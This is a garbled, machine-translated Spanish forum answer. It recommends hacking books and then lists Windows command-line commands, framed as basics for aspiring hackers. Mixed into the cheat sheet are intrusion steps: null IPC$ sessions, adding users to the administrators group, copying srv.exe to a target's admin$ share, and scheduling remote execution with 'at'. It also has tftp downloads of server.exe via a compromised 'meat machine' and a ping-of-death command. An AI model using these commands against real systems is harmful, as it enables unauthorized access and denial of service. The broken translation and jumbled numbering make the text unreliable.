Red de conocimiento informático - Espacio del host - Quiero aprender informática por mi cuenta. ¿Puedo comprar algunos libros de información básica?

Quiero aprender informática por mi cuenta. ¿Puedo comprar algunos libros de información básica?

1. "Comenzando con la piratería"

Este es el primer libro de piratería que leí. Contiene algunos conocimientos de piratería relativamente básicos, pero los siguientes ejemplos utilizan código html, principalmente Talking. sobre

conocimiento de intrusión de páginas web, no podía entenderlo en ese momento, así que fui a aprender html (en realidad, solo miré el código, no pude escribirlo en absoluto

De qué código viene, jaja...)

2. "Construye un hacker profesional en 30 días"

Cualquier libro que diga que puedes llegar a ser competente. En unos pocos días y convertirse en un maestro rápido en unos pocos días, en realidad no es digno de confianza, pero este no es el tema del que vamos a hablar ahora. Este libro puede compensar las deficiencias del. Libro anterior. Hay algunos contenidos que pueden explicarse con más detalle, lo cual es adecuado para principiantes.

3. "Anti-Black Files"

Este libro fue escrito por Dongfang Piaoyun, quien parece ser el subcomandante del Cuerpo Verde Jaja, déjame comentar primero...

4. "Una introducción práctica al ataque y la defensa de los hackers"

Este es un libro de hackers con el combate práctico como línea principal, ¡muy recomendable! ! ! Después de todo, la tecnología informática sólo se puede mejorar en la práctica. La teoría por sí sola no funcionará. Puede leer este libro y utilizarlo, creo que será útil para su capacidad práctica.

Los anteriores son algunos libros introductorios sobre piratería, y algunos de ellos son iguales. ¡Puedes elegir los buenos y seguirlos! ! !

5. "Programación en lenguaje C"

Aquellos que no aprenden programación nunca podrán convertirse en hackers, por lo que aprender programación se ha convertido en la única forma de aprender magia negra. También es el proceso que requiere más energía y resistencia. Este es el escrito por Tan Haoqiang. También puedes leer el libro "el lenguaje de programación C" escrito por un extranjero.

Si puedes depurar y operar todos los códigos del libro tú mismo, para lenguaje C. Dominar los conceptos básicos no debería ser un problema.

6. "Explicación detallada de VC++"

Este es un libro escrito por otros basado en el video tutorial de Sun Xin, por lo que este libro también tiene su video de apoyo. de la siguiente manera:

/special/0009159F/vc.html

7. "Programación en lenguaje ensamblador IBM-PC"

Esto es una publicación de la Universidad de Tsinghua. está un poco desactualizado, es de la era de las máquinas de 16 bits y es un poco diferente de los actuales win32 y win64, pero su esencia es similar, creo que para los camaradas que quieran aprender análisis inverso, el ensamblaje también lo es. una buena elección. Es un curso obligatorio. En cuanto a este libro, puedes mirar

Mira el video tutorial en lenguaje ensamblador de la Universidad Sun Yat-sen. El método de enseñanza también es relativamente novedoso. de un vistazo La dirección es la siguiente:

/dispbbs_121_164375_1.html

Si desea ver el vídeo en línea, puede verlo en la siguiente dirección: Fundadores Greg Hoglund y James. Butler presenta en detalle cómo el atacante ingresa al sistema

y persiste durante mucho tiempo sin ser detectado, y cómo los piratas informáticos destruyen los sistemas del kernel de Windows XP y Windows 2000.

El concepto puede ser aplicado a cualquier sistema operativo convencional moderno. A través de este libro, los lectores pueden dominar completamente los rootkits y mejorar sus capacidades de seguridad informática.

18. "0day Security: Tecnología de análisis de vulnerabilidades de software"

Se acaba de publicar en abril. Algunos de los foros de nieve y aprendí mucho de ellos. Es adecuado para camaradas interesados ​​en el desbordamiento.

Quiero decirte algo de sentido común... aunque hay muchos, ¡todos son básicos! ¡Espero que puedas estudiar mucho!

Comando DOS

net use ipipc$ " " /usuario:" " Establezca un enlace IPC vacío

net use ipipc$ "Contraseña" /usuario:" Nombre de usuario" para establecer un enlace IPC no nulo

net use h: ipc$ "contraseña" /usuario:"nombre de usuario" Después de iniciar sesión directamente, asigne el C: de la otra parte al H local:

net use h: ipc$ Después de iniciar sesión, asigne la otra parte C: al H:

net use ipipc$ /del elimine el enlace IPC

net use h: /del elimina la asignación de la otra parte al local La asignación es H:

usuario de red nombre de usuario contraseña/agregar Crear usuario

usuario de red invitado /activo: sí Activar usuario invitado

usuario de red Ver qué usuarios

nombre de cuenta de usuario de red para ver las propiedades de la cuenta

administradores de grupo local de red nombre de usuario/agregar Agregar "usuario" a el administrador para que tenga derechos de administrador Nota:

Agregue s después de administrador para hacerlo plural

net start Compruebe qué servicios están habilitados

net start service. nombre inicia el servicio (por ejemplo: net start telnet, net start Schedule)

net stop nombre del servicio para detener un servicio

hora neta ip objetivo verificar la hora de la otra parte

p>

net time target ip /set establece la hora de la computadora local y la "IP de destino" "La hora del host está sincronizada y el mensaje de confirmación se puede cancelar agregando el parámetro /yes

net view para ver qué privilegios *** están habilitados en la LAN local

net ver ip para ver los privilegios habilitados en la LAN de la otra parte Qué recursos compartidos hay

net config muestra la red del sistema configuración

cierre de sesión de red desconecta los recursos compartidos

pausa de red nombre del servicio pausa un servicio

net envía ip "mensaje de texto" para enviar información a la otra parte

tipo de conexión de red net ver e información que se utiliza en la LAN

net share para ver el ***share abierto localmente

net share ipc$ Habilitar ipc$* **share

net share ipc$ /del Eliminar ipc$***share

net share c$ /del Eliminar C: ***share

usuario de red invitado 12345 Después de iniciar sesión como usuario invitado, cambie la contraseña a 12345

contraseña de red cambiar contraseña de inicio de sesión del sistema

p>

netstat -a para verificar qué puertos están abierto, netstat -an de uso común

netstat -n para verificar el estado de la conexión de red del puerto, netstat -an de uso común

netstat -v para verificar Trabajo en progreso

netstat -p ejemplo de nombre de protocolo: netstat -p tcq/ip Verificar el uso de un determinado protocolo (verificar el uso del protocolo tcp/ip)

netstat -s Verificar en progreso Uso de todos protocolos utilizados

nbtstat -A ip Si uno de los puertos 136 a 139 de la otra parte está abierto, puede ver el nombre de usuario del inicio de sesión reciente de la otra parte (el anterior a 03 es el nombre de usuario) - Nota : Parámetros - A debe estar en mayúscula

tracert - parámetro i

p (o nombre de la computadora) ruta de seguimiento (paquete), parámetro: "-w número" se usa para establecer el intervalo de tiempo de espera.

Ping ip (o nombre de dominio) envía datos con un tamaño predeterminado de 32 bytes al otro host Parámetros: "-l [espacio] tamaño del paquete"; "-n número de veces para enviar datos" ; "-t "se refiere a hacer ping todo el tiempo."

ping -t -l 65550 ip ping of death (enviar archivos de más de 64K y hacer ping todo el tiempo se convierte en el ping de la muerte)

ipconfig (winipcfg) para Windows NT y XP (Windows 95 98) Ver la dirección IP local, parámetros disponibles de ipconfig

El número "/all" muestra toda la información de configuración

tlist -t muestra el proceso en una lista de líneas de árbol ( adicionales al sistema) Las herramientas, que no están instaladas de forma predeterminada, se encuentran en la carpeta Soporte/herramientas del directorio de instalación)

kill -F Agregue el parámetro -F al nombre del proceso para forzar el final de un proceso (es una herramienta adicional para el sistema, que no está disponible por defecto) Instalado, en la carpeta Support/tools del directorio de instalación)

del -F Agrega el parámetro -F al archivo nombre para eliminar el archivo de solo lectura, /AR, /AH, /AS, /AA respectivamente significa eliminar archivos de solo lectura, ocultos, del sistema y de archivo /A-R, /A-

H, /A-S, /A-A significa eliminar archivos que no sean archivos de solo lectura, ocultos, del sistema y de archivo. Por ejemplo, "DEL/AR *.*" significa eliminar todos los archivos de solo lectura en el directorio actual, y "DEL/A-

S *.*" significa eliminar todos los archivos en el directorio actual. directorio excepto archivos del sistema

p>

Dos:

del /S /Q directorio o use: rmdir /s /Q directorio /S para eliminar el directorio y todos los subdirectorios y archivos bajo el directorio. Al mismo tiempo, utilice el parámetro /Q para cancelar la operación de eliminación del sistema

Eliminar directamente después de la confirmación.

(Los dos comandos tienen el mismo efecto)

move La ruta de la letra de la unidad es el nombre del archivo que se va a mover. La ruta para almacenar el archivo movido es el nombre del archivo después del movimiento. cancele el mensaje para confirmar que existe el mismo archivo en el directorio movido. Sobrescritura directa

fc one.txt two.txt > 3st.txt Compare los dos archivos y envíe las diferencias al archivo 3st.txt. "> " y "> >" son comandos de redirección

Comando

en el número de identificación para iniciar una tarea programada registrada

en /delete detiene todas las tareas programadas. Si usa el parámetro /yes, puede ir directamente sin confirmación Detener

en el número de identificación/eliminar Detener una tarea programada registrada

en Ver todas las tareas programadas

at ip time nombre del programa (o un comando) /r Ejecute un programa en el otro lado en un momento determinado y reinicie la computadora

finger nombre de usuario @host Compruebe qué usuarios han iniciado sesión recientemente

puerto ip telnet remoto y servidor de inicio de sesión, el puerto predeterminado es 23

open ip se conecta a IP (un comando después de iniciar sesión en telnet)

telnet Escriba telnet directamente en el local máquina para ingresar al telnet de la máquina local

copiar ruta Nombre de archivo 1 Ruta nombre de archivo 2 /y Copie el archivo 1 al directorio especificado como archivo 2. Utilice el parámetro /y para cancelar la confirmación de que desea sobrescribir un archivo de directorio existente

copiar c:srv.exe ipadmin $ Copiar el c:srv.exe local al administrador de la otra parte

cppy 1st.jpg/b+2st.txt /a 3st.jpg Oculte el contenido del 2st.txt en el 1st.jpg para generar el 3st.jpg nuevo archivo. Nota:

El encabezado del archivo 2st.txt debe tener tres filas vacías, parámetros: /b se refiere a archivo binario, /a se refiere al archivo en formato ASCLL

copiar ipadmin$svv exe c: o:copyipadmin$*.* Copia el archivo srv.exe (todos los archivos

compartidos por administrador de la otra parte$***) a C local:

xcopy Para copiar la dirección de destino del árbol de archivos o directorios nombre del directorio para copiar el árbol de archivos y directorios, use el parámetro /Y no solicitará sobrescribir el mismo archivo

tftp -i propia IP (use la IP de la máquina de carne cuando use la máquina de carne como trampolín) obtenga server.exe c:server.exe Después de iniciar sesión, descargue la "IP"

server.exe al host de destino c:server.exe Parámetros: -i significa transferir en modo binario, como transferir archivos exe. Se usa cuando no se agrega -i, se transmitirá en modo ASCII

(modo de transmisión de archivos de texto)

tftp -i La IP de la otra parte puso c:server.exe Después de iniciar sesión, cárguelo en el c:server.exe local para alojar

El puerto ftp ip se utiliza para cargar archivos al servidor o realizar operaciones con archivos. El puerto predeterminado es 21. bin se refiere a la transmisión en formato binario (entrada de archivo ejecutable); el valor predeterminado es la transmisión en formato ASCII (al escribir este archivo)

la impresión de ruta muestra la ruta IP y mostrará principalmente la dirección de red y la subred. máscara Máscara de red, dirección de puerta de enlace

dirección de puerta de enlace, dirección de interfaz Interfaz

arp Ver y procesar caché ARP ARP significa resolución de nombres y es responsable de resolver una IP en una dirección MAC física. arp -a mostrará toda la información

nombre del programa de inicio o comando /max o /min Abra una nueva ventana y maximice (minimice) ejecute un programa o comando. Se espera que tome O(∩_∩). O